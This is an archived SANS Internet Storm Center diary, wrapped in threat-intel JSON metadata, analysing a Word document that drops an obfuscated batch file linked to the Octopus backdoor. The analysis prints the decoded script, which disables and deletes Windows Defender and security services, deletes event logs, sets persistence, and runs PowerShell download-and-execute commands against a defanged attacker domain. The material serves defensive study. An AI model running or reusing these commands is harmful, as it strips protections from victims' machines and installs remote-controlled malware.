{
	"id": "75837fba-ec4b-4241-9bb8-741d0c036f87",
	"created_at": "2026-04-06T00:13:09.996401Z",
	"updated_at": "2026-04-10T03:20:43.72844Z",
	"deleted_at": null,
	"sha1_hash": "708635dc3e098d4e5b68ace57967a0b5c9dd512c",
	"title": "Octopus Backdoor is Back with a New Embedded Obfuscated Bat File",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 292004,
	"plain_text": "Octopus Backdoor is Back with a New Embedded Obfuscated Bat File\r\nBy SANS Internet Storm Center\r\nArchived: 2026-04-05 21:48:24 UTC\r\nLast week, I found another interesting Word document that delivered a malicious script to potential victims. Usually, Office documents carry VBA macros that are activated using a bit of social engineering (the classic yellow ribbon), but this time the document did not contain any malicious code:\r\nremnux@/MalwareZoo/20220505$ oledump.py f1763579a9319d2506ee468031e1eb1b.doc\r\n 1: 114 '\\x01CompObj'\r\n 2: 4096 '\\x05DocumentSummaryInformation'\r\n 3: 4096 '\\x05SummaryInformation'\r\n 4: 7624 '1Table'\r\n 5: 15906 'Data'\r\n 6: 4096 'WordDocument'\r\nBut you can see that stream 5 is called \"Data\". When you open the document, you see this:\r\nhttps://isc.sans.edu/diary/rss/28628\r\nPage 1 of 8\n\nThe document SHA256 is 6e3ef2551b1f34685025f9fe1d6358ef95fbe21ada8ed9de3c7c4d5070520f6e and its current VT score is 22/60[1]. The document contains embedded objects that look like PDF files, but they aren't:\r\nIf you follow the instructions and click on one of the PDF icons (all three point to the same script), the script will be executed. Let's have a look at it:\r\nIt looks pretty well obfuscated:\r\n%xlnlrpz%%fynwfvh%%dskbaxq%.%fynwfvh%%lxckycu%%fynwfvh% %wegkoem%%tjxpouf%%tjxpouf% %yvyapob%%eeuyvwk\r\nIn Microsoft batch files, \"%...%\" represents a variable. If you look carefully at the code, you see that we just have a sequence of environment variables with, sometimes, clear characters. Those characters are special ones like \"/\", \".\" or numbers. The obfuscation technique used here is pretty simple but efficient. 
Environment variables just contain letters from A to Z:\r\nset wegkoem=a\r\nset bpltpmn=b\r\nset khoziql=c\r\nset tjxpouf=d\r\nset fynwfvh=e\r\nset gfuxihu=f\r\nset dskbaxq=g\r\nset yvyapob=h\r\nset pjdvllg=i\r\nset mnmpqbg=j\r\nset eeuyvwk=k\r\nset mkmhtbo=l\r\nset hxiqvtv=m\r\nset bysdcmi=n\r\nset nutqtmu=o\r\nset brlbmmf=p\r\nset hoahisa=q\r\nset xlnlrpz=r\r\nset ybbwhci=s\r\nset flbzyhx=t\r\nset jxdklrj=u\r\nset cbwqklh=v\r\nset rmyyyjm=w\r\nset lxckycu=x\r\nset tjtkrhi=y\r\nset ikoiset=z\r\nOnce you have replaced all variables with the corresponding letters, the script is easier to read, but you still have to clean it:\r\n@%e%%c%%h%%o% %o%%f%%f%\r\nHere is the complete decoded script:\r\n@echo off\r\nreg delete \"hklm\\software\\policies\\microsoft\\windows defender\" /f\r\nreg add \"hklm\\software\\policies\\microsoft\\windows defender\" /v \"disableantispyware\" /t reg_dword /d\r\nreg add \"hklm\\software\\policies\\microsoft\\windows defender\" /v \"disableantivirus\" /t reg_dword /d \"1\r\nreg add \"hklm\\software\\policies\\microsoft\\windows defender\\mpengine\" /v \"mpenablepus\" /t reg_dword /d\r\nreg add \"hklm\\software\\policies\\microsoft\\windows defender\\real-time protection\" /v \"disablebehaviorm\r\nreg add \"hklm\\software\\policies\\microsoft\\windows defender\\real-time protection\" /v \"disableioavprote\r\nreg add \"hklm\\software\\policies\\microsoft\\windows defender\\real-time protection\" /v \"disableonaccessp\r\nreg add \"hklm\\software\\policies\\microsoft\\windows defender\\real-time protection\" /v \"disablerealtimem\r\nreg add \"hklm\\software\\policies\\microsoft\\windows defender\\real-time protection\" /v \"disablescanonrea\r\nreg add \"hklm\\software\\policies\\microsoft\\windows defender\\reporting\" /v \"disableenhancednotification\r\nreg add \"hklm\\software\\policies\\microsoft\\windows defender\\spynet\" /v \"disableblockatfirstseen\" /t re\r\nreg add 
\"hklm\\software\\policies\\microsoft\\windows defender\\spynet\" /v \"spynetreporting\" /t reg_dword\r\nreg add \"hklm\\software\\policies\\microsoft\\windows defender\\spynet\" /v \"submitsamplesconsent\" /t reg_d\r\nrem 0 - disable logging\r\nreg add \"hklm\\system\\currentcontrolset\\control\\wmi\\autologger\\defenderapilogger\" /v \"start\" /t reg_dw\r\nreg add \"hklm\\system\\currentcontrolset\\control\\wmi\\autologger\\defenderauditlogger\" /v \"start\" /t reg_\r\nrem disable wd tasks\r\nschtasks /change /tn \"microsoft\\windows\\exploitguard\\exploitguard mdm policy refresh\" /disable\r\nschtasks /change /tn \"microsoft\\windows\\windows defender\\windows defender cache maintenance\" /disable\r\nschtasks /change /tn \"microsoft\\windows\\windows defender\\windows defender cleanup\" /disable\r\nschtasks /change /tn \"microsoft\\windows\\windows defender\\windows defender scheduled scan\" /disable\r\nschtasks /change /tn \"microsoft\\windows\\windows defender\\windows defender verification\" /disable\r\nrem disable wd systray icon\r\nreg delete \"hklm\\software\\microsoft\\windows\\currentversion\\explorer\\startupapproved\\run\" /v \"windows\r\nreg delete \"hkcu\\software\\microsoft\\windows\\currentversion\\run\" /v \"windows defender\" /f\r\nreg delete \"hklm\\software\\microsoft\\windows\\currentversion\\run\" /v \"windowsdefender\" /f\r\nrem remove wd context menu\r\nreg delete \"hkcr\\*\\shellex\\contextmenuhandlers\\epp\" /f\r\nreg delete \"hkcr\\directory\\shellex\\contextmenuhandlers\\epp\" /f\r\nreg delete \"hkcr\\drive\\shellex\\contextmenuhandlers\\epp\" /f\r\nrem disable wd services\r\nreg add \"hklm\\system\\currentcontrolset\\services\\wdboot\" /v \"start\" /t reg_dword /d \"4\" /f\r\nreg add \"hklm\\system\\currentcontrolset\\services\\wdfilter\" /v \"start\" /t reg_dword /d \"4\" /f\r\nreg add \"hklm\\system\\currentcontrolset\\services\\wdnisdrv\" /v \"start\" /t reg_dword /d \"4\" /f\r\nreg add 
\"hklm\\system\\currentcontrolset\\services\\wdnissvc\" /v \"start\" /t reg_dword /d \"4\" /f\r\nreg add \"hklm\\system\\currentcontrolset\\services\\windefend\" /v \"start\" /t reg_dword /d \"4\" /f\r\nreg add \"hklm\\system\\currentcontrolset\\services\\securityhealthservice\" /v \"start\" /t reg_dword /d \"4\r\nreg.exe add hklm\\software\\microsoft\\windows\\currentversion\\policies\\system /v enablelua /t reg_dword\r\nreg add \"hkey_current_user\\software\\microsoft\\windows\\currentversion\\run\" /v \"#one\" /t reg_sz /d \"pow\r\nreg add \"hkey_current_user\\software\\microsoft\\windows\\currentversion\\run\" /v \"#oneupdate\" /t reg_sz /\r\n\"c:\\program files\\microsoft security client\\setup.exe\" /x /s /disableoslimit\r\nstart /b powershell add-mppreference -exclusionpath \"c:\" -force\r\nstart /b powershell add-mppreference -exclusionpath \"c:\\users\" -force\r\nstart /b powershell -w hidden \"iex(new-object net.webclient).downloadstring('hxxp://hpsj[.]firewall-g\r\n \r\nstart /b powershell -w hidden \"add-type -assemblyname system.core;iex (new-object net.webclient).down\r\nschtasks /create /sc minute /mo 60 /f /tn achromeupdater /tr \"powershell -w hidden \\\"add-type -assemb\r\nschtasks /f /create /sc minute /mo 60 /tn achromeupdateri /tr \"powershell.exe -w hidden 'iex (new-obj\r\nsc stop windefend\r\nsc config windefend start= disabled\r\nsc delete windefend\r\nsc stop wdnissvc\r\nsc config wdnissvc start= disabled\r\nsc delete wdnissvc\r\nsc stop sense\r\nsc config sense start= disabled\r\nsc delete sense\r\nsc stop wuauserv\r\nsc config wuauserv start= disabled\r\nsc stop usosvc\r\nsc config usosvc start= disabled\r\nsc stop waasmedicsvc\r\nsc config waasmedicsvc start= disabled\r\nsc stop securityhealthservice\r\nsc config securityhealthservice start= disabled\r\nsc delete securityhealthservice\r\nsc stop sdrsvc\r\nsc config sdrsvc start= disabled\r\nsc stop wscsvc\r\nsc config wscsvc start= 
disabled\r\nsc stop wdiservicehost\r\nsc config wdiservicehost start= disabled\r\nsc stop wdisystemhost\r\nsc config wdisystemhost start= disabled\r\nsc stop installservice\r\nsc config installservice start= disabled\r\nsc stop vaultsvc\r\nsc config vaultsvc start= disabled\r\nsc stop spooler\r\nsc config spooler start= disabled\r\nsc stop licensemanager\r\nsc config licensemanager start= disabled\r\nsc stop diagtrack\r\nsc config diagtrack start= disabled\r\ntaskkill /f /im smartscreen.exe\r\ntaskkill /f /im securityhealthservice.exe\r\ncd c:\\\r\ncd c:\\program files\\\r\nrd /s /q \"windows defender\"\r\nrd /s /q \"windows defender advanced threat protection\"\r\nrd /s /q \"windows security\"\r\ncd c:\\program files (x86)\\\r\nrd /s /q \"windows defender\"\r\ncd c:\\programdata\\microsoft\r\nrd /s /q \"windows defender\"\r\nrd /s /q \"windows defender advanced threat protection\"\r\nrd /s /q \"windows security health\"\r\ncd c:\\\r\ncd windows\r\ncd system32\r\ndel /f windowsupdateelevatedinstaller.exe\r\ndel /f securityhealthsystray.exe\r\ndel /f securityhealthservice.exe\r\ndel /f securityhealthhost.exe\r\ndel /f securitycenterbroker.dll\r\ndel /f securitycenterbrokerps.dll\r\ndel /f securityhealthagent.dll\r\ndel /f securityhealthproxystub.dll\r\ndel /f securityhealthsso.dll\r\ndel /f smartscreensettings.exe\r\ndel /f smartscreenps.dll\r\ndel /f smartscreen.exe\r\ndel /f windows.security.integrity.dll\r\ndel /f windowsdefenderapplicationguardcsp.dll\r\ndel /f wscsvc.dll\r\ndel /f wscsvc.dll.mui\r\ndel /f wsecedit.dll\r\ncd winevt\\logs\r\ndel /f microsoft-windows-windows defender4operational.evtx\r\ndel /f microsoft-windows-windows defender4whc.evtx\r\ndel /f microsoft-windows-security-audit-configuration-client4operational.evtx\r\ndel /f microsoft-windows-security-enterprisedata-filerevocationmanager4operational.evtx\r\ndel /f microsoft-windows-security-netlogon\r\nThe domain hpsj[.]firewall-gateway[.]net 
is well-known: it's the good old Octopus backdoor. I already wrote a diary about it in 2020[2]! But it seems to be back with a simple but effective obfuscation technique.\r\n[1] https://www.virustotal.com/gui/file/6e3ef2551b1f34685025f9fe1d6358ef95fbe21ada8ed9de3c7c4d5070520f6e\r\n[2] https://isc.sans.edu/forums/diary/Malicious+Word+Document+Delivering+an+Octopus+Backdoor/26918/\r\nXavier Mertens (@xme)\r\nXameco\r\nSenior ISC Handler - Freelance Cyber Security Consultant\r\nSource: https://isc.sans.edu/diary/rss/28628",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://isc.sans.edu/diary/rss/28628"
	],
	"report_names": [
		"28628"
	],
	"threat_actors": [],
	"ts_created_at": 1775434389,
	"ts_updated_at": 1775791243,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/708635dc3e098d4e5b68ace57967a0b5c9dd512c.pdf",
		"text": "https://archive.orkl.eu/708635dc3e098d4e5b68ace57967a0b5c9dd512c.txt",
		"img": "https://archive.orkl.eu/708635dc3e098d4e5b68ace57967a0b5c9dd512c.jpg"
	}
}